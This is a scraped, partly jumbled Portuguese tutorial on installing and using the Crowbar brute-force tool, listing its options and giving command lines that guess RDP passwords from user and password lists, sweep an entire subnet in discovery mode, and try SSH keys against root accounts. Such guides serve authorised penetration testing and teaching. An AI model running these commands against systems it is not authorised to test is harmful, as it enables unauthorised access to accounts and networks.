O que \u00e9 necess\u00e1rio para instala\u00e7\u00e3o:<\/p>\n
Primeiramente devemos instalar as\u00a0depend\u00eancias<\/p>\n
\u00a0 # Apt-get install openvpn vncviewer freerdp-x11<\/p>\n
Em seguida, obtermos a vers\u00e3o mais recente do github.<\/p>\n
\u00a0 # Git clone http:\/\/github.com\/galkan\/crowbar<\/p>\n
Observa\u00e7\u00e3o: O RDP depende de sua vers\u00e3o Kali. Pode ser xfreerdp para a vers\u00e3o mais recente.<\/p>\n
Para \u00a0ver todas as op\u00e7\u00f5es de uso, utilize o comando Crowbar –help<\/p>\n
-h: Mostrar o\u00a0menu (ajuda).<\/p>\n
-b: servi\u00e7o utilizados no alvo. Crowbar agora suporta vnckey, OpenVPN, sshkey, RDP.<\/p>\n
-s: Alvo de endere\u00e7o ip.<\/p>\n
-S: Nome do arquivo que armazena o endereco\u00a0ip.<\/p>\n
-u: usu\u00e1rio.<\/p>\n
-U:O nome do arquivo que armazena lista username.<\/p>\n
-n: contagem da linha.<\/p>\n
-l: O nome do arquivo que armazena log. Por default o nome do arquivo \u00e9 crwobar.log, que est\u00e1 localizado no diret\u00f3rio atual.<\/p>\n
-o: nome do arquivo de sa\u00edda que armazena a tentativa de sucesso.<\/p>\n
-c: Password.<\/p>\n
-C: Nome que armazena senhas lista arquivo.<\/p>\n
-t: valor do tempo limite.<\/p>\n
-p: N\u00famero da porta<\/p>\n
-k: arquivo Key caminho completo.<\/p>\n
-m: OpenVPN caminho do arquivo de configura\u00e7\u00e3o<\/p>\n
-d: Executar nmap, a fim de descobrir se a porta de destino \u00e9 aberta ou n\u00e3o. Para que voc\u00ea possa facilmente executar o Brute Force direcionado ao Crowbar.<\/p>\n
-v: modo detalhado que mostra todas as tentativas, incluindo falhas.<\/p>\n
<\/p>\n
Brute Force no RDP<\/p>\n
<\/p>\n
Fig 1<\/p>\n Estes s\u00e3o alguns exemplos que voc\u00ea tem como op\u00e7\u00f5es para usar o Crowbar.<\/p>\n A tentativa de for\u00e7a bruta RDP para um \u00fanico endere\u00e7o IP usando um \u00fanico nome de usu\u00e1rio e uma senha \u00fanica:<\/p>\n <\/p>\n A tentativa de for\u00e7a bruta RDP para um \u00fanico endere\u00e7o IP usando um arquivo de lista com nome de usu\u00e1rio e uma senha \u00fanica.<\/p>\n A tentativa de for\u00e7a bruta RDP para um \u00fanico endere\u00e7o IP usando um \u00fanico nome de usu\u00e1rio e uma lista de senhas:<\/p>\n crowbar.py -b rdp -s 192.168.2.250\/32 -u localuser -C \/root\/Desktop\/passlist<\/p>\n A tentativa de for\u00e7a bruta RDP em uma rede usando uma lista de nome deusu\u00e1rio e uma lista de senha no modo de descoberta:<\/p>\n crowbar.py -b rdp -s 192.168.2.0\/24 -U \/root\/Desktop\/userlist -C \/root\/Desktop\/passlist -d<\/p>\n <\/p>\n Brute Force no SSH Estes s\u00e3o os exemplos que voc\u00ea tem como op\u00e7\u00f5es para usar o Crowbar. A tentativa de for\u00e7a bruta SSH para chave de um \u00fanico endere\u00e7o IP usando um \u00fanico nome de usu\u00e1rio e uma chave ssh:<\/p>\n crowbar.py -b sshkey -s 192.168.2.105\/32 -u root -k \/root\/.ssh\/id_rsa<\/p>\n <\/p>\n A tentativa de for\u00e7a bruta SSH para chave de um \u00fanico endere\u00e7o IP usando um \u00fanico nome de usu\u00e1rio e uma pasta de chave ssh:<\/p>\n A tentativa de for\u00e7a bruta SSH para chave a uma rede usando um \u00fanico nome de usu\u00e1rio e uma pasta de chave ssh no modo de descoberta.<\/p>\n![\"1\"](\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/16.jpg\")
<\/a><\/p>\ncrowbar.py -b rdp -s 192.168.2.182\/32 -u admin -c Aa123456<\/code><\/p>\n<\/a>Fig 2<\/p>\ncrowbar.py -b rdp -s 192.168.2.211\/32 -U \/root\/Desktop\/userlist -c passw0rd<\/code><\/p>\n
\n <\/a><\/code> Fig 3<\/p>\n <\/a><\/code> Fig 4<\/p>\n <\/a><\/code> Fig 5<\/p>\n<\/a>\u00a0 Fig 6<\/p>\ncrowbar.py -b sshkey -s 192.168.2.105\/32 -u root -k \/root\/.ssh\/<\/code><\/p>\n<\/a>\u00a0Fig 7<\/p>\ncrowbar.py -b sshkey -s 192.168.2.0\/24 -u root -k \/root\/.ssh\/ -d<\/code><\/p>\n